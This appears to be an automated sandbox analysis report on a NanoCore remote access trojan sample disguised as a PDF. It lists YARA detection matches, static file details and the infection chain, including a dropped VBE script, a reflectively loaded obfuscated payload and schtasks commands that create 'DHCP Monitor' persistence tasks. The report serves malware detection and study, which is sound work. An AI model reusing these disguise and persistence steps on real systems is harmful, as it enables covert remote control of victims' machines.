      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EF5F0 appears 31 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEC50 appears 56 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEB78 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BC0DC0 appears 38 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BBFD60 appears 39 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
      Source: 004349256789197.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/45@28/1
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6C74 GetLastError,FormatMessageW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Users\user\Desktop\004349256789197.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder10_51
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxname
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxstime
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: STARTDLG
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: xzB
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 004349256789197.pdf.scr.exeStatic file information: File size 1181640 > 1048576
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF640 push ecx; ret
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EEB78 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C362CC pushad ; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BF0332 push edi; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0E06 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: 004349256789197.pdf.scr.exeStatic PE information: section name: .didat
      Source: ihgsvw.exe.0.drStatic PE information: real checksum: 0x15a0e8 should be: 0x1560ce
      Source: 004349256789197.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x12da1b
